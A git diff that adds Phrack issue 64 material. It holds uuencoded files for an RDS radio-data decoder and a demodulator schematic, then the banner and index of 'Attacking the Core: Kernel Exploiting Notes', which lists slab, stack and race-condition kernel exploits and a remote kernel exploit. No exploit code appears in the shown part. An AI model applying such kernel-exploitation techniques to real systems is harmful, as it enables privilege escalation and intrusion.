+M<W5B<W1I='5T92!S97)V:6-E(&%V86EL86)L92(["B`@("`D179E;G1;,C`R
+M,ET@/2`B<'5B;&EC('1R86YS<&]R="!S=')I:V4B.PH@("`@)$5V96YT6S(P
+M,CA=(#T@(FUE<W-A9V4@8V%N8V5L;&5D(CL*("`@("1%=F5N=%LR,#(Y72`]
+M(")M97-S86=E(&-A;F-E;&QE9"(["B`@("`D179E;G1;,C`S,%T@/2`B;65S
+M<V%G92!C86YC96QL960B.PH@("`@)$5V96YT6S(P,S-=(#T@(FUE<W-A9V4@
+M8V%N8V5L;&5D(CL*("`@("1%=F5N=%LR,#,T72`](")M97-S86=E(&-A;F-E
+M;&QE9"(["B`@("`D179E;G1;,C`S-5T@/2`B;65S<V%G92!C86YC96QL960B
+M.PH@("`@)$5V96YT6S(P,SA=(#T@(FUE<W-A9V4@8V%N8V5L;&5D(CL*("`@
+M("1%=F5N=%LR,#,Y72`](")M97-S86=E(&-A;F-E;&QE9"(["B`@("`D179E
+M;G1;,C`T,%T@/2`B;65S<V%G92!C86YC96QL960B.PH@("`@)$5V96YT6S(P
+M-#==(#T@(BAN=6QL(&UE<W-A9V4I('MC;VUP;&5T96QY('-I;&5N="!M97-S
+M86=E+"!S964@<')O=&]C;VPL('-E8W0N(#,N-2XT?2(["@H@("`@(R!$22!T
+M86)L92`@("`*"B`@("`D9&E[)S`Q,2=](#T@(DUO;F\@+R!04R!C:&%R(#<L
+M."([(`H@("`@)&1I>R<Q,3$G?2`](")3=&5R96\@+R!04R!C:&%R(#<L."([
+M"B`@("`D9&E[)S`Q,"=](#T@(DYO="!!<G1I9FEC:6%L($AE860@+R!04R!C
+M:&%R(#4L-B(["B`@("`D9&E[)S$Q,"=](#T@(D%R=&EF:6-I86P@2&5A9"`O
+M(%!3(&-H87(@-2PV(CL*("`@("1D:7LG,#`Q)WT@/2`B3F]T(&-O;7!R97-S
+M960@+R!04R!C:&%R(#,L-"(["B`@("`D9&E[)S$P,2=](#T@(D-O;7!R97-S
+M960@+R!04R!C:&%R(#,L-"(["B`@("`D9&E[)S`P,"=](#T@(E-T871I8R!0
+M5%D@+R!04R!C:&%R(#$L,B(["B`@("`D9&E[)S$P,"=](#T@(D1Y;F%M:6,@
+M4W=I=&-H("\@4%,@8VAA<B`Q+#(B.PH*("`@(",@4%19(&-O9&5S"@H@("`@
+M)'!T>7LG,#`P,#`G?2`]("(P("`M($YO;F4B.R`@("`@("`@("`@("`@)'!T
+M>7LG,#`P,#$G?2`]("(Q("`M($YE=W,B.PH@("`@)'!T>7LG,#`P,3`G?2`]
+M("(R("`M($-U<G)E;G0@069F86ER<R([("`@)'!T>7LG,#`P,3$G?2`]("(S
+M("`M($EN9F]R;6%T:6]N(CL*("`@("1P='E[)S`P,3`P)WT@/2`B-"`@+2!3
+M<&]R="([("`@("`@("`@("`@("1P='E[)S`P,3`Q)WT@/2`B-2`@+2!%9'5C
+M871I;VXB.PH@("`@)'!T>7LG,#`Q,3`G?2`]("(V("`M($1R86UA(CL@("`@
+M("`@("`@("`@)'!T>7LG,#`Q,3$G?2`]("(W("`M($-U;'1U<F4B.PH@("`@
+M)'!T>7LG,#$P,#`G?2`]("(X("`M(%-C:65N8V4B.R`@("`@("`@("`@)'!T
+M>7LG,#$P,#$G?2`]("(Y("`M(%9A<FEE9"!3<&5E8V@B.PH@("`@)'!T>7LG
+M,#$P,3`G?2`]("(Q,"`M(%!O<"!-=7-I8R([("`@("`@("`@)'!T>7LG,#$P
+M,3$G?2`]("(Q,2`M(%)O8VL@375S:6,B.PH@("`@)'!T>7LG,#$Q,#`G?2`]
+M("(Q,B`M($5A<WD@3&ES=&5N:6YG(CL@("`@)'!T>7LG,#$Q,#$G?2`]("(Q
+M,R`M($QI9VAT($-L87-S:6-A;"(["B`@("`D<'1Y>R<P,3$Q,"=](#T@(C$T
+M("T@4V5R:6]U<R!#;&%S<VEC86PB.R`D<'1Y>R<P,3$Q,2=](#T@(C$U("T@
+M3W1H97(@375S:6,B.PH@("`@)'!T>7LG,3`P,#`G?2`]("(Q-B`M(%=E871H
+M97(@)B!-971R(CL@("`@)'!T>7LG,3`P,#$G?2`]("(Q-R`M($9I;F%N8V4B
+M.PH@("`@)'!T>7LG,3`P,3`G?2`]("(Q."`M($-H:6QD<F5N)W,@4')O9W,B
+M.R`@)'!T>7LG,3`P,3$G?2`]("(Q.2`M(%-O8VEA;"!!9F9A:7)S(CL*("`@
+M("1P='E[)S$P,3`P)WT@/2`B,C`@+2!296QI9VEO;B([("`@("`@("`@("1P
+M='E[)S$P,3`Q)WT@/2`B,C$@+2!0:&]N92!);B(["B`@("`D<'1Y>R<Q,#$Q
+M,"=](#T@(C(R("T@5')A=F5L("8@5&]U<FEN9R([("`D<'1Y>R<Q,#$Q,2=]
+M(#T@(C(S("T@3&5I<W5R92(["B`@("`D<'1Y>R<Q,3`P,"=](#T@(C(T("T@
+M2F%Z>B!-=7-I8R([("`@("`@("`D<'1Y>R<Q,3`P,2=](#T@(C(U("T@0V]U
+M;G1R>2!-=7-I8R(["B`@("`D<'1Y>R<Q,3`Q,"=](#T@(C(V("T@3F%T:6]N
+M86P@375S:6,B.R`@("`D<'1Y>R<Q,3`Q,2=](#T@(C(W("T@3VQD:65S($UU
+M<VEC(CL*("`@("1P='E[)S$Q,3`P)WT@/2`B,C@@+2!&;VQK($UU<VEC(CL@
+M("`@("`@("1P='E[)S$Q,3`Q)WT@/2`B,CD@+2!$;V-U;65N=&%R>2(["B`@
+M("`D<'1Y>R<Q,3$Q,"=](#T@(C,P("T@06QA<FT@5&5S="([("`@("`@("`D
+M<'1Y>R<Q,3$Q,2=](#T@(C,Q("T@06QA<FT@+2!!;&%R;2`A(CL*"B`@("`C
+M($=R;W5P(&-O9&5S"@H@("`@)&=R<'LG,#`P,#`G?2`]("(P02`@+2!4=6YI
+M;F<B.R`@("`@("`D9W)P>R<P,#`P,2=](#T@(C!"("`M(%1U;FEN9R(["B`@
+M("`D9W)P>R<P,#`Q,"=](#T@(C%!("`M($ET96T@3G5M8F5R(CL@("1G<G![
+M)S`P,#$Q)WT@/2`B,4(@("T@271E;2!.=6UB97(B.PH@("`@)&=R<'LG,#`Q
+M,#`G?2`]("(R02`@+2!2861I;U1E>'0B.R`@("`D9W)P>R<P,#$P,2=](#T@
+M(C)"("`M(%)A9&EO5&5X="(["B`@("`D9W)P>R<P,#$Q,"=](#T@(C-!("`M
+M($]$02!)1"([("`@("`@("1G<G![)S`P,3$Q)WT@/2`B,T(@("T@3W!E;B!$
+M871A(CL*("`@("1G<G![)S`Q,#`P)WT@/2`B-$$@("T@0VQO8VLO5&EM92([
+M("`@)&=R<'LG,#$P,#$G?2`]("(T0B`@+2!/<&5N($1A=&$B.PH@("`@)&=R
+M<'LG,#$P,3`G?2`]("(U02`@+2!41$,@+R!/1$$B.R`@("`D9W)P>R<P,3`Q
+M,2=](#T@(C5"("`M(%1$0R`O($]$02(["B`@("`D9W)P>R<P,3$P,"=](#T@
+M(C9!("`M($]P96X@1&%T82([("`@("1G<G![)S`Q,3`Q)WT@/2`B-D(@("T@
+M3W!E;B!$871A(CL*("`@("1G<G![)S`Q,3$P)WT@/2`B-T$@("T@4F%D:6\@
+M4&%G:6YG(CL@)&=R<'LG,#$Q,3$G?2`]("(W0B`@+2!/<&5N($1A=&$B.PH@
+M("`@)&=R<'LG,3`P,#`G?2`]("(X02`@+2!434,B.R`@("`@("`@("`D9W)P
+M>R<Q,#`P,2=](#T@(CA"("`M($]P96X@1&%T82(["B`@("`D9W)P>R<Q,#`Q
+M,"=](#T@(CE!("`M($5M97)G("\@3T1!(CL@("1G<G![)S$P,#$Q)WT@/2`B
+M.4(@("T@3W!E;B!$871A(B`["B`@("`D9W)P>R<Q,#$P,"=](#T@(C$P02`M
+M(%!43B([("`@("`@("`@("1G<G![)S$P,3`Q)WT@/2`B,3!"("T@3W!E;B!$
+M871A(CL*("`@("1G<G![)S$P,3$P)WT@/2`B,3%!("T@3W!E;B!$871A(CL@
+M("`@)&=R<'LG,3`Q,3$G?2`]("(Q,4(@+2!/<&5N($1A=&$B.PH@("`@)&=R
+M<'LG,3$P,#`G?2`]("(Q,D$@+2!/<&5N($1A=&$B.R`@("`D9W)P>R<Q,3`P
+M,2=](#T@(C$R0B`M($]P96X@1&%T82(["B`@("`D9W)P>R<Q,3`Q,"=](#T@
+M(C$S02`M(%)A9&EO(%!A9VEN9R([("1G<G![)S$Q,#$Q)WT@/2`B,3-"("T@
+M3W!E;B!$871A(CL*("`@("1G<G![)S$Q,3`P)WT@/2`B,31!("T@3F5T($EN
+M9F\B.R`@("`@)&=R<'LG,3$Q,#$G?2`]("(Q-$(@+2!.970@26YF;R(["B`@
+M("`D9W)P>R<Q,3$Q,"=](#T@(C$U02`M(%)$0E,B.R`@("`@("`@("1G<G![
+M)S$Q,3$Q)WT@/2`B,35"("T@4W=I=&-H:6YG($EN9F\B.PH*?0H*<W5B('5S
+M86=E('L*("`@9&EE(")3:6UP;&4@4D13+51-0R!$96-O9&5R(#`N,2`@("`@
+M?'P@:'1T<#HO+V1E=BYI;G9E<G-E<&%T:"YC;VTO<F1S"D-O<'ER:6=H="`R
+M,#`W($%N9')E82!"87)I<V%N:2!\?"`\86YD<F5A7$!I;G9E<G-E<&%T:"YC
+M;VT^"E5S86=E.B`D,"!;+6A\+4A\+5!\+71=(%LM9"`\;&]C871I;VX@9&(@
+M<&%T:#Y=(%LM<"`\4$D@;G5M8F5R/ET@/&EN<'5T(&9I;&4^"B`@("UT(&1I
+M<W!L87D@;VYL>2!T;6,@<&%C:V5T<PH@("`M2"!(5$U,(&]U='!U="`H;W5T
+M<'5T<R!T;R`O=&UP+W)D<RT\<F%N9&]M/B]R9',M*BYH=&UL*2`*("`@+7`@
+M4$D@;G5M8F5R"B`@("U0(%!)('-E87)C:`H@("`M9"!L;V-A=&EO;B!D8B!P
+M871H"B`@("UH('1H:7,@:&5L<`H*3F]T93H@+60@;W!T:6]N(&5X<&5C=',@
+M82!$050@3&]C871I;VX@5&%B;&4@8V]D92!A8V-O<F1I;F<@=&\@5$U#1BU,
+M5"U%1BU-1D8M=C`V(`H@("`@("!S=&%N9&%R9"`H,C`P-2\P-2\Q,2E<;EQN
+%(CL*?0H`
+`
+end
+
+<--> Simple RDS Decoder 0.1 - srdsd.uue
+
+
+Here's the schematic of the RDS Demodulator. You can directly use it to
+view / print the circuit or import the file with Xcircuit[9] to
+modify the diagram.
+
+<++> RDS_Demodulator.ps.gz.uue
+
+begin 644 RDS_Demodulator.ps.gz
+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
+'E.-BC&0`````
+`
+end
+
+<--> RDS_Demodulator.ps.gz.uue
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
diff --git a/phrack64/6.txt b/phrack64/6.txt
new file mode 100644
index 0000000..e7dc24a
--- /dev/null
+++ b/phrack64/6.txt
@@ -0,0 +1,5583 @@
+            _                                                  _
+          _/B\_                                              _/W\_
+          (* *)              Phrack #64 file 6               (* *)
+          | - |                                              | - |
+          |   | Attacking the Core : Kernel Exploiting Notes |   |
+          |   |                                              |   |
+          |   |       By sqrkkyu <sgrakkyu@antifork.org>     |   |
+          |   |          twzi <twiz@email.it>                |   |
+          |   |                                              |   |
+          (______________________________________________________)
+
+
+
+                             ==Phrack Inc.==
+
+               Volume 0x00, Issue 0x00, Phile #0x00 of 0x00
+
+
+|=------------=[ Attacking the Core : Kernel Exploiting Notes ]=---------=|
+|=-----------------------------------------------------------------------=|
+|=-------------=[ sgrakkyu@antifork.org and twiz@email.it ]=-------------=|
+|=------------------------=[ February 12 2007 ]=-------------------------=|
+
+
+------[  Index 
+
+  1 - The playground 
+
+    1.1 - Kernel/Userland virtual address space layouts
+    1.2 - Dummy device driver and real vulnerabilities
+    1.3 - Notes about information gathering
+
+  2 - Kernel vulnerabilities and bugs 
+
+    2.1 - NULL/userspace dereference vulnerabilities
+        2.1.1 - NULL/userspace dereference vulnerabilities : null_deref.c 
+    2.2 - The Slab Allocator
+        2.2.1 - Slab overflow vulnerabilities
+        2.2.2 - Slab overflow exploiting : MCAST_MSFILTER
+        2.2.3 - Slab overflow vulnerabilities : Solaris notes 
+    2.3 - Stack overflow vulnerabilities 
+        2.3.1 - UltraSPARC exploiting
+        2.3.2 - A reliable Solaris/UltraSPARC exploit
+    2.4 - A primer on logical bugs : race conditions 
+        2.4.1 - Forcing a kernel path to sleep
+        2.4.2 - AMD64 and race condition exploiting: sendmsg
+
+  3 - Advanced scenarios 
+    
+    3.1 - PaX KERNEXEC & separated kernel/user space 
+    3.2 - Remote Kernel Exploiting 
+        3.2.1 - The Network Contest
+        3.2.2 - Stack Frame Flow Recovery
+        3.2.3 - Resources Restoring 
+        3.2.4 - Copying the Stub
+        3.2.5 - Executing Code in Userspace Context [Gimme Life!]
+        3.2.6 - The Code : sendtwsk.c
+
+  4 - Final words  
+
+  5 - References
+
+  6 - Sources : drivers and exploits [stuff.tgz]      
+
+------[ Intro 
+
+
+The latest years have seen an increasing interest towards kernel based
